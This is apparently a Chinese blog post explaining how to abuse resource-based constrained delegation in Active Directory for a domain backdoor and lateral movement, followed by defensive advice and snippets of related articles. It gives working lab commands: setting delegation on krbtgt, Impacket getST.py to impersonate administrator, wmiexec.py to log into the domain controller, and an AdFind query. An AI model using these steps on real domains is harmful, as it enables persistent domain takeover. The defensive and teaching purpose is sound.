【域权限维持】-基于资源的约束委派(RBCD)

最新推荐文章于 2024-06-23 12:10:55 发布
原创 最新推荐文章于 2024-06-23 12:10:55 发布 · 1.7k 阅读 · 8 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#windows #网络安全 #系统安全

文章详细介绍了如何利用基于资源的约束性委派(RBCD)进行域后门攻击,包括设置属性、获取服务票据(ST)以及使用WMIEXEC进行权限提升。同时,也讨论了防御策略,如限制高权限用户配置委派、清除不必要的SPN和日志监控。

Invoke-TrimarcADChecks:https://www.hub.trimarcsecurity.com/post/securing-active-directory-performing-an-active-directory-security-review

Impacket Python版本:https://github.com/SecureAuthCorp/impacket

基于资源的约束性委派(Resource Based Constrained Delegation)

是Win Server 2012引入的,无需域管设置相关属性,请求ST(服务票据)的过程与约束委派类似,传统的约束委派S4U2Self返回的票据一定是可转发的,如果不可转发那么S4U2Proxy将失败;但是RBCD中,就算S4U2Self返回的票据不可转发,S4U2Proxy也是可以成功的,并且S4U2Proxy返回的服务票据总是可转发。S4U2Self的票据转发基于属性:"TrustedToAuthenticationForDelegation"决定

简单理解为:A机器设置基于资源的约束性委派给B(设置msDS-AllowedToActOnBehalfOfOtherIdentity属性),则B可以通过s4u协议申请高权限票据对A进行利用。

域后门利用

原理:需要域管理员权限,修改krbtgt或是域控的"msDS-AllowedToActOnBehalfOfOtherIdentity"属性,加入已知域账户的SID

1、拥有将域机器加入域的域用户的权限。(将机器B加入域的域用户拥有修改机器B的msDS-AllowedToActOnBehalfOfOtherIdentity属性的权限)
权限:GenericAll(完全控制),GenericWrite、WriteProperty、WriteDacl等等权限都是可以修改账户属性的
2、一个任意服务账户或者一个机器账户(每一个普通域账户默认可以添加10个机器账户)

设置属性值并查询【域控上执行】

Set-ADUser krbtgt -PrincipalsAllowedToDelegateToAccount zhangsan
Get-ADUser krbtgt -Properties PrincipalsAllowedToDelegateToAccount

#清除命令
Set-ADUser krbtgt -PrincipalsAllowedToDelegateToAccount $null

在这里插入图片描述

获取ST【受控域账户机器执行】

python getST.py -dc-ip 192.168.139.195 -spn krbtgt -impersonate administrator byjb.com/zhangsan:Wlaq!testZ3

在这里插入图片描述

使用wmiexec登录域控【受控域账户机器执行】

set KRB5CCNAME=administrator.ccache
python wmiexec.py -dc-ip 192.168.139.195 -no-pass -k administrator@dc01.byjb.com

在这里插入图片描述

查看krbtgt账户的账户属性

在这里插入图片描述

横向移动利用–扩大可控机器范围

在内网渗透中,当我们已经获取到一个账户,或者一个机器权限后,如何扩大自己的优势?(除了用已知的密码去爆破其他机器以外)

默认域用户可以添加10个机器账户,由属性"ms-DS-MachineAccountQuota"的值决定,而机器自身和把机器拉入域的域用户都有权限更改机器的"msDS-AllowedToActOnBehalfOfOtherIdentity"属性。
在这里插入图片描述

思路:
1、寻找可控的账户都拉哪些机器入域(查询ms-DS-CreatorSID,非域管加域机器才会有该属性)
2、寻找哪些机器的"msDS-AllowedToActOnBehalfOfOtherIdentity"属性值是可控账户

AdFind.exe -b "DC=WLAQ,DC=COM" -f "(&(samAccountType=805306369))" cn mS-DS-CreatorSID

在这里插入图片描述

https://xz.aliyun.com/t/10061#toc-12

防御方式

高权限用户禁止配置委派,添加到受保护组

在这里插入图片描述
在这里插入图片描述

清除域内所有不需要的SPN、禁止域用户配置密码永不更新

Get-ADUser -Filter * -Properties ServicePrincipalName, PasswordNeverExpires | ? {($_.ServicePrincipalName -ne "") -and ($_.PasswordNeverExpires -eq $true)}

在这里插入图片描述

日志检测

Windows Event 5136
修改目录服务对象【msDs-AllowedToActOnBehalfOfOtherIdentity】

注:此文章参考了很多的网络上的其他文章!!!

基于资源约束委派攻击
渗透之路,攻防之间皆学问
04-13 2499
首先,在传统的约束委派中,情况是这样的:有一个服务账户(比如一个Web服务器),它被配置为可以代表某个用户(比如一个域用户)去访问另一个服务(比如数据库)。这就像是你给了你的秘书(服务账户)一张你的身份证(用户的凭证),让她去帮你办点事(访问数据库)。
红队内网攻防渗透:内网渗透之内网对抗:横向移动篇&Kerberos&委派安全&RBCD资源&Operators组成员&HTLMRelay结合
HACKONE的博客
06-23 642
基于资源约束委派(RBCD)是在Windows Server 2012中新加入的功能,与传统的约束委派相比,它不再需要域管理员权限去设置相关属性。RBCD把设置委派的权限赋予了机器自身,既机器自己可以决定谁可以被委派来控制我。也就是说机器自身可以直接在自己账户上配置msDS-AllowedToActOnBehalfOfOtherIdentity属性来设置RBCD。所以核心就是谁或什么权限能修改msDS-AllowedToActOnBehalfOfOtherIdentity。
SharpAllowedToAct:通过基于资源约束委派(msDS-AllowedToActOnBehalfOfOtherIdentity)进行计算机对象接管
05-24
夏普允许行动 描述 基于通过基于资源约束委派(MSDS-AllowedToActOnBehalfOfOtherIdentity)C#实现的计算机对象接管的由 。 积分也他的,并作为我的代码依赖于他的工具。 编译指令 确保成功安装了必要的NuGet软件包,并仅构建项目。
rbcd-attack:使用Impacket从外部进行基于Kerberos资源约束委派攻击
04-01
滥用基于Kerberos资源约束委派 TL; DR 此存储库是针对Windows Active Directory域中针对Kerberos资源约束委派的实际攻击。 与其他常见实施方式的不同之处在于,我们是从Windows Domain外部发起攻击的,而不是从加入域的计算机(通常是Windows)发起的攻击。 仅使用Python3 (及其依赖项)实施攻击。 在上测试了最新的Impacket(撰写本文时为0.9.21)。 攻击 总而言之,攻击没有针对任何深度细节,而是针对域计算机,正是与目标域计算机相关的服务主体。 我们在这里需要具备的先决条件: 具有对目标计算机的写访问权的域帐户(对目标计算机域对象的msDS-AllowedToActOnBehalfOfOtherIdentity属性的完全写访问权) 创建新计算机帐户的权限(通常是默认设置,请参见MachineAccount
基于资源约束委派RBCD)学习
whojoe的博客
07-21 3694
基于资源约束委派RBCD)学习原理环境搭建利用添加机器账户中继&委派无另一台机器权限有另一台机器权限参考文章 原理 环境搭建 主机 机器名 ip 用户 密码 版本 域控 ad.test.com 192.168.164.147 administrator Aa1234 win2012r2 域内机器 user.test.com 192.168.164.129 user1 Uu1234. win2008r2 域内机器 user2.test.com 192.168.164.150
基于资源约束委派利用
qq_18811919的博客
02-25 1348
关于基于资源约束委派本文章总共说了常用的三种利用方式: 1.Ntlm Relay+打印机bug+基于资源约束委派拿下目标控制权 2.Acount Operators组权限滥用进行基于资源约束委派获取目标权限 3.拿下目标机器入域的域账号拿下目标控制权 以及一种绕过方式: 1.CVE-2020-17049 Kerberos Bronze Bit+基于资源约束委派绕过敏感账号限制。
内网渗透(七十七)域权限维持之ACL滥用(中)
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
05-18 714
如图所示是微软对于msDS-AllowedToActOnBehalfOfOtherldentity 属性的描述jack是域中的一个普通用户。
红队内网攻防渗透:内网渗透之内网对抗:横向移动篇&Kerberos&委派安全&非约束系&约束系&RBCD资源系&Spooler利用
最新发布
HACKONE的博客
06-23 548
机器A(域控)访问具有非约束委派权限的机器B的服务,会把当前认证用户(域管用户)的的TGT放在ST票据中,一起发送给机器B,机器B会把TGT存储在lsass进程中以备下次重用。简而言之,非约束委派是指用户账户将自身的TGT转发给服务账户使用。委派是一种域内应用模式,是指将域内用户账户的权限委派给服务账号,服务账号因此能以用户的身份在域内展开活动(请求新的服务等),类似于租房中介房东的关系去理解。攻击者拿到了一台配置非约束委派的机器权限,可以诱导域管来访问该机器,然后得到管理员的TGT,从而模拟域管用户。
基于资源约束委派
mingyqf的博客
02-23 924
参考:https://blog.csdn.net/nicai321/article/details/122679357 原理: 基于资源约束委派(RBCD)是在Windows Server 2012中新加入的功能,与传统的约束委派相比,它不再需要域管理员权限去设置相关属性。RBCD把设置委派的权限赋予了机器自身,既机器自己可以决定谁可以被委派来控制我。也就是说机器自身可以直接在自己账户上配置msDS-AllowedToActOnBehalfOfOtherIdentity属性来设置RBCD。 漏洞复现: 资
滥用基于资源约束委派来攻击Active Directory
weixin_30530523的博客
03-15 532
0x00 前言 早在2018年3月前,我就开始了一场毫无意义的争论,以证明TrustedToAuthForDelegation属性是无意义的,并且可以在没有该属性的情况下实现“协议转换”。我相信,只要一旦启用约束委派(msDS-AllowedToDelegateTo不为空),它是否配置为使用“仅Kerberos”或“任何身份验证协议”并起作用。 我在Benjamin Delpy(@genti...
内网渗透--域环境下基于资源约束委派利用
sangfor_edu的博客
07-21 520
域内用户都有一个属性叫做ms-ds-MachineAccountQuota,它代表的是允许用户在域中常见计算机账户的个数,默认是10。那么这就代表我们如果拥有一个普通的域用户那么我们就可以利用这个用户最多可以创建十个新的计算机帐户也就是机器账户。...
域渗透之基于资源约束委派
qq_56426046的博客
11-15 583
REDTEAM\hack -> WriteProperty(将机器加入域的账号,也就是mS-DS-CreatorSID属性中的账户) NT AUTHORITY\SELF -> WriteProperty(机器账户自身也可以修改) 我们再回顾一个知识点,默认域控的ms-DS-MachineAccountQuota属性设置允许所有域用户向一个域添加 多达10个计算机帐户,就是说只要有一个域凭据就可以在域内任意添加机器账户。RBCD把设置委派的权限赋予了机器自身,既机器自己可以决定 谁可以被委派来控制我。
域渗透——基于资源约束委派利用
a3320315的博客
07-03 1967
环境 域: test.com 域控:Windows server 2012R2, 主机名: AD, IP: 192.168.1.7 委派的域内主机:系统:win2008R2,主机名:win2008,ip:192.168.1.24 域内普通用户: test,对win2008有写的权限 域内普通用户: test1 攻击机器:系统:win2019 ip:192.168.1.19 登录用户为test1 设置test的写权限 验证test这个用户对win2008是否具有写权限,可以使用PowerView枚举w
Kerberos 域委派攻击之基于资源约束委派
Adminxe的博客
03-06 862
CSDN自动迁移博客文章注意区别:约束委派 不能跨域进行委派,基于资源约束委派可以跨域和林如果约束委派,必须拥有权限,该特权是敏感的,通常仅授予域管理员。为了使用户/资源更加独立,Windows Server 2012 中引入了基于资源约束委派。基于资源约束委派不需要域管理员权限去设置,而是把设置属性的权限赋予给了机器自身。基于资源约束委派允许资源配置受信任的帐户委派给他们。基于资源约束委派只能在运行 ·Windows Server 2012 及以上的域控制器·上配置,
内网安全:非约束委派 约束委派 资源约束委派
qq_50854662的博客
06-03 334
内网安全:非约束委派 约束委派 资源约束委派
委派
weixin_30737433的博客
04-20 101
完全不能理解,这到底是个什么玩意。 转载于:https://www.cnblogs.com/yesihoang/p/4441712.html
域控权限持久化之利用委派打造隐蔽后门
谢公子的博客
03-29 2064
关于委派以及委派的一些攻击手法,传送门:域渗透之委派攻击 本文讲的是当拿到了域管理员权限后,如何利用基于资源委派打造隐蔽后门。 域控:Win2012 192.168.10.24 域成员主机:Win7 192.168.10.130 普通域用户:xie\hack 在基于资源委派攻击中我们提到,当服务B设置了允许服务A基于资源约束委派后,我们可以利用服务A实现权限提升。那么,当我们...
windows中关于委派(delegation)的理解
热门推荐
Shanfenglan's blog
09-24 17万+
CATALOG前言委派一些问题S4U2SELF延伸S4U2PROXY非约束委派约束委派基于资源约束委派基于委派的攻击非约束委派攻击约束委派攻击基于资源约束委派攻击 前言 委派一般出现在域环境中。它是一种机制,在kerberos认证的时候会涉及到。不正确的委派的配置,可能使攻击者达到提权的目的。 委派 假设域内用户A需要访问服务器B,并需要以A的身份对服务器的端数据库进行更改。则A就会进行一个kerberos认证,来获取访问B的ticket。这时候就需要用到委派,也就是说,A依旧访问B且只申请一个访
从外部利用Impacket进行Kerberos资源约束委派攻击解析
使用Python3和Impacket库可以从外部对Windows AD域中的Kerberos资源进行约束委派攻击。这意味着攻击者不需要访问加入域的计算机,而是在域外进行攻击。这增加了攻击的隐蔽性和复杂性,因为攻击者不需要物理或虚拟地...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值